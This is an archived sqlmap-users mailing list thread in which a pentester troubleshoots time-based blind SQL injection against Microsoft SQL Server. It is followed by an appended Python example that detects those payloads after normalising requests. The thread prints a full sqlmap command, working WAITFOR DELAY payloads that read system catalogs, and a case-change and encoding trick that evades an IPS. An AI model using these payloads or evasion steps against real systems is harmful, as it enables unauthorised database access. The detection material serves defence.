As Rodrigo stated correctly, you can use -C to specify column names
manually.

For forcing sqlmap to requery certain results you can use --fresh-queries.

Bye

p.s. thx for donation :)
p.p.s. I am glad that you managed to use tamper scripts to bypass IPS/WAF
On Sep 25, 2014 8:04 PM, "Rodrigo Zanatta Silva" <rodrigozanattasi...@gmail.com> wrote:

> well, about the column, it is possible, I think, to use the
>
>>     -D DB               DBMS database to enumerate
>>     -T TBL              DBMS database table(s) to enumerate
>>     -C COL              DBMS database table column(s) to enumerate
>>     -X EXCLUDECOL       DBMS database table column(s) to not enumerate
>>     -U USER             DBMS user to enumerate
>
> I really think the -C will search your column. There is a brute force
> for common columns (or was it tables?). Anyway, set your column and it will
> accept.
>
> 2014-09-25 10:17 GMT-03:00 floyd <floyd_...@yahoo.de>:
>
>> Hi Miroslav
>>
>> Thanks for your time and for sqlmap. I hope you got the donation :)
>>
>> By now I figured out what it was: an IPS. Had to
>> --tamper=caseselect,charencode where caseselect is just a simple
>> .replace("SELECT","sElEcT"). What a stupid IPS.
>>
>> Is there any way to correct errors that sqlmap is getting? I sometimes
>> have an extra character at the end of table names and would like to
>> correct that.
>>
>> And: Is there a possibility to tell sqlmap manually, which columns a
>> table has? That would be very helpful for blind time based, because,
>> well, it takes forever :)
>>
>> Btw. awesome resume feature on ^C !
>>
>> Best,
>> floyd
>>
>> On 24/09/14 13:03, Miroslav Stampar wrote:
>> > Hi.
>> >
>> > This looks like a permission problem while reading system tables. That
>> > would explain why DB_NAME() works and everything else fails.
>> >
>> > Bye
>> >
>> > On Sep 23, 2014 4:27 PM, "floyd" <floyd_...@yahoo.de> wrote:
>> >
>> >     Hi everybody
>> >
>> >     I'm doing a Pentest and I'm able to do a time based blind sql injection
>> >     on a very big database.
>> >
>> >     It takes some time, but that's fine for now. But sqlmap is failing when
>> >     it comes to retrieving the *number of [databases, tables, columns,
>> >     whatever]*:
>> >
>> >     $ /opt/sqlmap-dev/sqlmap.py -r http_req1_v2.txt -p "redactedParameter"
>> >     --user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0)
>> >     Gecko/20100101 Firefox/32.0" --level=5 --risk=3 --dbms=MSSQL
>> >     --os=Windows --suffix="; --" --prefix="';" --technique=T -v 3
>> >     --time-sec=2 --proxy socks5://localhost:5050 --dbs -o
>> >     [...snip...]
>> >     [11:57:49] [INFO] confirming Microsoft SQL Server
>> >     [11:57:49] [INFO] the back-end DBMS is Microsoft SQL Server
>> >     web server operating system: Windows
>> >     web application technology: ASP.NET, ASP.NET 2.X.XXXXX (redacted)
>> >     back-end DBMS: Microsoft SQL Server 2008
>> >     [11:57:49] [INFO] fetching database names
>> >     [11:57:49] [INFO] fetching number of databases
>> >     [11:57:49] [WARNING] multi-threading is considered unsafe in time-based
>> >     data retrieval. Going to switch it off automatically
>> >     [11:57:49] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT
>> >     ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) FROM
>> >     master..sysdatabases),1,1))>51) WAITFOR DELAY '0:0:2'; --
>> >     [11:57:49] [WARNING] time-based comparison requires larger statistical
>> >     model, please wait..............................
>> >     [11:58:25] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT
>> >     ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) FROM
>> >     master..sysdatabases),1,1))>54) WAITFOR DELAY '0:0:2'; --
>> >     [11:58:25] [WARNING] it is very important not to stress the network
>> >     adapter during usage of time-based payloads to prevent potential errors
>> >     [11:58:55] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT
>> >     ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) FROM
>> >     master..sysdatabases),1,1))>56) WAITFOR DELAY '0:0:2'; --
>> >     [11:59:25] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT
>> >     ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) FROM
>> >     master..sysdatabases),1,1))>57) WAITFOR DELAY '0:0:2'; --
>> >     [11:59:55] [INFO] retrieved:
>> >     [11:59:55] [DEBUG] performed 4 queries in 126.19 seconds
>> >     [11:59:55] [WARNING] in case of continuous data retrieval problems you
>> >     are advised to try a switch '--no-cast' or switch '--hex'
>> >     [11:59:55] [ERROR] unable to retrieve the number of databases
>> >
>> >     However, for the *database names* sqlmap will continue with the
>> >     DB_NAME(X) technique. Right now it is dumping out all the different
>> >     database names, which works fine:
>> >
>> >     [15:08:34] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT
>> >     ISNULL(CAST(DB_NAME(110) AS NVARCHAR(4000)),CHAR(32))),16,1))!=109)
>> >     WAITFOR DELAY '0:0:2'; --
>> >
>> >     Because I got many of the following errors (and the occurrence of the
>> >     error is random), I patched the time delay in the python code to be
>> >     fixed to 2 seconds (maybe you want to have an option for that):
>> >
>> >     [15:03:14] [ERROR] invalid character detected. retrying..
>> >     [15:03:14] [WARNING] increasing time delay to 3 seconds
>> >
>> >     That works fine and I get good results. However, when I try to dump
>> >     table names now (from one of the known databases) with the -D DB_NAME
>> >     and --tables switch, it is again failing to retrieve the number of
>> >     tables:
>> >
>> >     [14:51:53] [INFO] fetching tables for database: DB_NAME
>> >     [14:51:53] [INFO] fetching number of tables for database 'DB_NAME'
>> >     [14:51:53] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT
>> >     master.dbo.fn_varbintohexstr(CAST(ISNULL(CAST(LTRIM(STR(COUNT(name))) AS
>> >     NVARCHAR(4000)),CHAR(32)) AS VARBINARY(8000))) FROM DB_NAME..sysobjects
>> >     WHERE DB_NAME..sysobjects.xtype IN (CHAR(117),CHAR(118))),1,1))>66)
>> >     WAITFOR DELAY '0:0:10'; --
>> >     [14:51:53] [WARNING] time-based comparison requires larger statistical
>> >     model, please wait..............................
>> >     [14:52:26] [CRITICAL] considerable lagging has been detected in
>> >     connection response(s). Please use as high value for option '--time-sec'
>> >     as possible (e.g. 10 or more)
>> >     [14:52:56] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT
>> >     master.dbo.fn_varbintohexstr(CAST(ISNULL(CAST(LTRIM(STR(COUNT(name))) AS
>> >     NVARCHAR(4000)),CHAR(32)) AS VARBINARY(8000))) FROM DB_NAME..sysobjects
>> >     WHERE DB_NAME..sysobjects.xtype IN (CHAR(117),CHAR(118))),1,1))>97)
>> >     WAITFOR DELAY '0:0:10'; --
>> >     [14:52:56] [WARNING] it is very important not to stress the network
>> >     adapter during usage of time-based payloads to prevent potential errors
>> >     [14:53:26] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT
>> >     master.dbo.fn_varbintohexstr(CAST(ISNULL(CAST(LTRIM(STR(COUNT(name))) AS
>> >     NVARCHAR(4000)),CHAR(32)) AS VARBINARY(8000))) FROM DB_NAME..sysobjects
>> >     WHERE DB_NAME..sysobjects.xtype IN (CHAR(117),CHAR(118))),1,1))>101)
>> >     WAITFOR DELAY '0:0:10'; --
>> >     [14:54:56] [INFO] retrieved:
>> >     [14:54:56] [DEBUG] performed 5 queries in 183.70 seconds
>> >     [...]
>> >     [14:57:27] [INFO] retrieved:
>> >     [14:57:27] [DEBUG] performed 5 queries in 150.30 seconds
>> >     [...]
>> >     [14:59:57] [INFO] retrieved:
>> >     [14:59:57] [DEBUG] performed 5 queries in 150.26 seconds
>> >     [14:59:57] [WARNING] unable to retrieve the number of tables for
>> >     database 'DB_NAME'
>> >     [14:59:57] [CRITICAL] unable to retrieve the tables for any database
>> >
>> >     Any suggestions? Using higher --time-sec, --hex or --no-cast didn't
>> >     help. Using --start and --stop also didn't work. I can't get any data
>> >     out of it like this.
>> >
>> >     Best regards,
>> >     floyd
>> >
>> >
>> >     ------------------------------------------------------------------------------
>> >     Meet PCI DSS 3.0 Compliance Requirements with EventLog Analyzer
>> >     Achieve PCI DSS 3.0 Compliant Status with Out-of-the-box PCI DSS Reports
>> >     Are you Audit-Ready for PCI DSS 3.0 Compliance? Download White paper
>> >     Comply to PCI DSS 3.0 Requirement 10 and 11.5 with EventLog Analyzer
>> >     http://pubads.g.doubleclick.net/gampad/clk?id=154622311&iu=/4140/ostg.clktrk
>> >     _______________________________________________
>> >     sqlmap-users mailing list
>> >     sqlmap-users@lists.sourceforge.net
>> >     https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>> >
>>
>>
>>
>>
>
>
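The IPS in the thread was beaten by nothing more than rewriting SELECT as sElEcT (floyd's caseselect tamper) on top of sqlmap's charencode tamper, which percent-encodes every character. A rule on the web tier that matches raw bytes case-sensitively cannot see either form, while the same rule applied after decoding and case-folding catches all of them. The following detector is an added example written for this page, not code from sqlmap or from anyone on the thread. It assumes the IPS was matching raw, case-sensitive bytes (the thread only says that sElEcT got through), builds its own sample requests from the payload shapes quoted above, and reimplements the charencode transformation only to construct the encoded test request.

```python
import re
from urllib.parse import unquote

# Signatures for what the thread's time-based payloads depend on. They are
# matched against the normalised (decoded, lower-cased) request, never the
# raw bytes.
SIGNATURES = {
    "mssql_time_delay": re.compile(r"\bwaitfor\s+delay\b"),
    "mssql_catalog_read": re.compile(r"\b(sysdatabases|sysobjects|syscolumns)\b"),
    "mssql_hex_helper": re.compile(r"\bfn_varbintohexstr\b"),
    "blind_char_probe": re.compile(r"\bunicode\s*\(\s*substring\s*\("),
}

# Stand-in for the case-sensitive, raw-byte rule the thread's IPS appears to
# have used (assumption: the thread only says that sElEcT got past it).
NAIVE_RULE = re.compile(r"SELECT .* FROM .* WAITFOR DELAY")


def normalise(raw: str, max_rounds: int = 3) -> str:
    """URL-decode until the text stops changing (bounded, so double encoding
    is handled without looping forever), lower-case it, collapse whitespace."""
    text = raw
    for _ in range(max_rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return re.sub(r"\s+", " ", text.lower()).strip()


def match_naive(raw: str) -> bool:
    """Raw, case-sensitive match: what a rule without normalisation sees."""
    return NAIVE_RULE.search(raw) is not None


def match_normalised(raw: str) -> list:
    """Names of every signature that fires once the request is normalised."""
    text = normalise(raw)
    return [name for name, rx in SIGNATURES.items() if rx.search(text)]


def audit(requests: list) -> list:
    """Per request: (naive rule fired?, list of normalised signatures that fired)."""
    return [(match_naive(r), match_normalised(r)) for r in requests]


# --- constructed test traffic; payload shapes copied from the thread -------

def percent_encode_all(payload: str) -> str:
    """Percent-encode every character, as sqlmap's charencode tamper does.
    Reimplemented here only to build the encoded test request."""
    return "".join("%%%02X" % ord(c) for c in payload)


COUNT_DBS = ("'; IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) "
             "AS NVARCHAR(4000)),CHAR(32)) FROM master..sysdatabases),1,1))>51) "
             "WAITFOR DELAY '0:0:2'; --")
COUNT_TABLES = ("'; IF(UNICODE(SUBSTRING((SELECT master.dbo.fn_varbintohexstr("
                "CAST(ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) "
                "AS VARBINARY(8000))) FROM DB_NAME..sysobjects WHERE "
                "DB_NAME..sysobjects.xtype IN (CHAR(117),CHAR(118))),1,1))>66) "
                "WAITFOR DELAY '0:0:10'; --")

SAMPLE_REQUESTS = [
    "id=1" + COUNT_DBS,                                                  # plain
    "id=1" + COUNT_DBS.replace("SELECT", "sElEcT"),                       # caseselect
    "id=1" + percent_encode_all(COUNT_DBS.replace("SELECT", "sElEcT")),  # + charencode
    "id=1" + COUNT_TABLES,                                               # sysobjects probe
    "id=1&sort=name",                                                    # benign
    "q=please%20select%20the%20delay%20option",                          # benign, shared words
]

if __name__ == "__main__":
    for req, (naive, hits) in zip(SAMPLE_REQUESTS, audit(SAMPLE_REQUESTS)):
        print(f"naive={naive!s:5} normalised={hits} :: {req[:60]}")
```

Running it shows the naive rule firing only on the first, untouched payload, while the normalised signatures fire identically on the plain, case-mangled and percent-encoded variants and stay quiet on the two benign requests. The decoding loop is bounded on purpose: an unbounded "decode until stable" loop is itself a cheap denial-of-service target.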